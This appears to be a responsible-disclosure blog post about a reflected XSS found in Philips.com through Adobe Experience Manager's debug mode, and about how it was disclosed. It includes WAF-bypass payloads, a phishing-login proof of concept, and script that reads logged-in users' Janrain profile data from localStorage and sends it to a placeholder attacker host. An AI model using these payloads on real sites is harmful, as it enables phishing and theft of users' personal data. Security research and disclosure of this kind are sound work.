Reflected XSS at Philips.com
Are you aware of any (private) bug bounty programs? I would love to get an invite. Please get in touch with me: Jonathan@Protozoan.nl
As always, we need to find a proper target for our attack. What about Philips? This year they won an award for being “The most reputable company in the Netherlands”. Customers trust their brand, and this makes them a high-profile target for phishers.
Reconnaissance, finding attack vectors
Where do we start if we want to find an XSS bug? There are no strict rules. I always start with Aquatone in order to discover interesting subdomains, see this report for details. After that I start Burp Suite, see this report, and I start looking around for bugs!
While clicking around the website, Burp Suite captures all the requests and responses. Burp Suite has a nice feature that creates a site map out of this data. This gives us a quick insight into how the website is structured, and it also allows us to easily repeat specific requests and check if a page is vulnerable to XSS attacks.
Another important thing to check is whether we are able to add HTML data to the website that persists in some database: a stored XSS.
Long story short, after a few hours of trying I did not find any reflected or stored attack vectors. I probed all the different parameters in the URLs captured by Burp Suite; all of them were properly escaped. Good job, Philips :-).
Below you see an example of a manipulated request that tries to inject <h1>Hi mom</h1> into the page. It got escaped into <h1>Hi+mom</h1>, so the browser won’t try to render it as HTML, just as plain text.
What to do now? Find holes in the server framework itself!
To discover which framework is being used by Philips we may use tools like WhatCMS.org. They have created an algorithm that is able to detect 320 different CMS systems; perfect!
Another way to discover the name of the framework is by taking a closer look at the source code of the main page:
Now that we know Adobe Experience Manager (AEM) is used, we should start reading as much as possible about this CMS. This gives us a feel for where to look for the weak spots: what are the best practices, were there any security updates in the past, and are there any hidden functions?
Adobe Experience Manager
Reading software documentation is a necessity, sometimes boring but often rewarding. Another thing you should always try is to just google the software and look for blogs or other places where experts share their tricks.
We discover something interesting if we do a quick google search for URL parameters.
What happens if we visit the Philips website with the ?debug=layout parameter appended? Does the debug mode render our URL in the page, unescaped?
Bypassing the Web Application Firewall (WAF)
So we have our point of injection: the URL path combined with the ?debug=layout parameter.
Identify the WAF
A quick way to identify the WAF(s) used by a target is to use WhatWaf. It probes the target with some payloads and compares the outcome with a set of detection rules.
The WAFs in use are ModSecurity and AkamaiGHost.
Bypass ModSecurity and AkamaiGHost
This is something I prefer to do by hand. Brute-forcing it with Burp Suite Intruder is possible, but hammering a server with plenty of requests is a bad idea; you will end up on some blacklist.
While drinking a good cup of tea we discover that:
1. The WAF blocks the <script> tag
2. The WAF allows the <body> tag
3. The WAF blocks the common on-event attributes (like onmouseover and onmouseout), but allows the use of the onpointerenter attribute
4. The WAF blocks the string https:// in the path
I always check if jQuery is loaded on the page; it allows us to create a smaller payload that works cross-browser (by using the getScript function).
Now it’s time to construct our payload:
https://www.philips.nl/healthcare/<body onpointerenter="jQuery.getScript('https:/' +'/attackerserver.ltd/philips/inject.js')">?debug=layout
We split the address into 'https:/' +'/attackerserver.ltd' in order to bypass the WAF's https:// string filter.
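To convince ourselves the filter never sees the blocked string, a quick sketch (the attacker hostname is the placeholder from the payload above):

```javascript
// The request only ever contains the two halves; "https://" is assembled
// at runtime in the victim's browser, after the WAF has already let it through.
const scriptUrl = 'https:/' + '/attackerserver.ltd/philips/inject.js';
console.log(scriptUrl); // "https://attackerserver.ltd/philips/inject.js"
```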
We URL-encode the payload to make sure that the link is valid and easy to send to our victim.
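As a sketch of that encoding step (the payload string is taken from the URL above; encodeURIComponent is one way to do it):

```javascript
// Encode the HTML payload so the final link contains no raw angle brackets
// or quotes that a mail client or chat app might mangle.
const payload = '<body onpointerenter="jQuery.getScript(\'https:/\' +' +
  '\'/attackerserver.ltd/philips/inject.js\')">';
const link = 'https://www.philips.nl/healthcare/' +
  encodeURIComponent(payload) + '?debug=layout';
console.log(link.includes('<')); // false: the payload is fully percent-encoded
```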
Creating a proper proof of concept
Everyone knows the <script>alert('XSS')</script> payload as a proof of concept. However, we will invest a few more minutes in making a more impressive proof of concept: a fully working phishing login.
This is a better way to show the impact; everyone understands it when they see a fake login screen.
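A minimal sketch of what such a PoC script could look like; the markup, endpoint, and wording here are my own illustration, not the original inject.js:

```javascript
// Hypothetical inject.js: cover the page with a fake login form that posts
// credentials to the attacker's server (attackerserver.ltd is a placeholder).
var overlayHtml =
  '<div style="position:fixed;top:0;left:0;right:0;bottom:0;' +
  'background:#fff;z-index:99999;text-align:center;padding-top:20%">' +
  '<form action="https://attackerserver.ltd/philips/phish" method="POST">' +
  '<h2>Sign in to My Philips</h2>' +
  '<input name="email" type="email" placeholder="Email"><br>' +
  '<input name="password" type="password" placeholder="Password"><br>' +
  '<button type="submit">Sign in</button></form></div>';
// In the browser we can reuse the jQuery that is already on the page:
// jQuery("body").append(overlayHtml);
```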
Bonus: Stealing user details from logged in users
Philips uses Janrain for their customer login. Janrain stores the user details in the browser's localStorage, so we are able to steal a visitor's details if they are logged in.
// Read the Janrain profile from localStorage, if present.
var user = localStorage.getItem("janrainCaptureProfileData") || "Not logged in";
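From there, a script could beacon the data home; a sketch, where the /philips/collect endpoint is a hypothetical name of mine:

```javascript
// Build the exfiltration URL for the stolen Janrain profile.
// The collect endpoint is an assumption for illustration only.
function buildExfilUrl(profileJson) {
  return 'https://attackerserver.ltd/philips/collect?d=' +
    encodeURIComponent(profileJson || 'Not logged in');
}
// In the browser a simple image beacon sends it without CORS issues:
// new Image().src = buildExfilUrl(localStorage.getItem("janrainCaptureProfileData"));
```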
Proof of concept in action
Bypassing initial fix
The initial fix from Philips was to add a new firewall rule that blocks all HTML tags, while leaving the debug mode on. However, we are able to inject an HTML tag that is missing the closing > bracket. The server will inject the payload and, as you can see, the > from the <br> tag will be used to close the body tag. Another nifty trick to bypass a WAF rule that blocks alert() strings: split the string into 2 pieces, add them as attributes to the HTML tag, and merge them again inside the same tag.
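One way such a split can be sketched (the attribute names and the eval-based merge are my assumptions, not necessarily the exact payload used):

```javascript
// The WAF matches the literal string "alert('XSS')"; here the two halves
// live in separate attributes and only meet at event time.
var tag = '<br a="ale" b="rt(\'XSS\')" ' +
  'onpointerenter="eval(this.getAttribute(\'a\')+this.getAttribute(\'b\'))">';
console.log(tag.includes("alert('XSS')")); // false: never appears in one piece
```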
- The simplest solution is to disable the debug mode; this can be done by configuring the dispatcher used by AEM.
- The WAF may be improved to block any HTML tags or on-event strings in the URL; however, blacklisting is never a good solution; we will always find a new payload that bypasses the blacklist.
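For the first recommendation, this is roughly what such a rule could look like in the Dispatcher filter section; a sketch, assuming Dispatcher 4.2+ (which can filter on the query string), with an arbitrary rule number:

```
# Deny any request that carries a debug query parameter
/0100 { /type "deny" /url "*" /query "debug=*" }
```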
Impact of the attack
- Exfiltration of user information from visitors of our prepared link
- Attacking the browsers of visitors by injecting a framework like beefproject.com
- Setting up a phishing login
Hall of Honors
13–07–18 Discovered bug, informed Philips by email
17–07–18 Asked Philips on Facebook Messenger if they received the report
17–07–18 Philips replied email that they received the report
17–07–18 Requested Philips to share the findings with the lighting.philips.com development team, this site is also vulnerable (Signify is the owner of Lighting Philips, a separate company. They share the Philips.com code base but have their own deployment and dev team).
26–07–18 Requested Philips for update, check if they informed Signify
30–07–18 Philips informs me that they deployed a fix on their own site and want to mention me in the Hall of Honors. No answer on the Signify question.
30–07–18 Informed Philips that their fix (WAF rule) is not enough, debug mode still possible.
31–07–18 Created new payload that bypasses the new WAF rule, informed Philips.
18–08–18 Requested update; Philips.com looks fixed (no debug mode anymore), lighting.philips.com still vulnerable to both payloads
27–08–18 Requested update from Philips again, no response.
27–08–18 Requested email address of Signify IT Security Manager from a personal contact working at Signify/Philips Lighting. Informed Signify IT Security Manager by email.
28–08–18 Signify confirmed the bug
29–08–18 Philips informed me that they sent the report to the Lighting division but did not receive any response.
06–09–18 Wrote this report, requested update from Signify
07–09–18 Signify informed me that they are busy with the fix
13–09–18 Signify informed me that the fix is deployed, I confirmed the fix, requested to disclose on 17–09–18
16–09–18 Philips informed me that they have no remarks
17–09–18 Published this blog.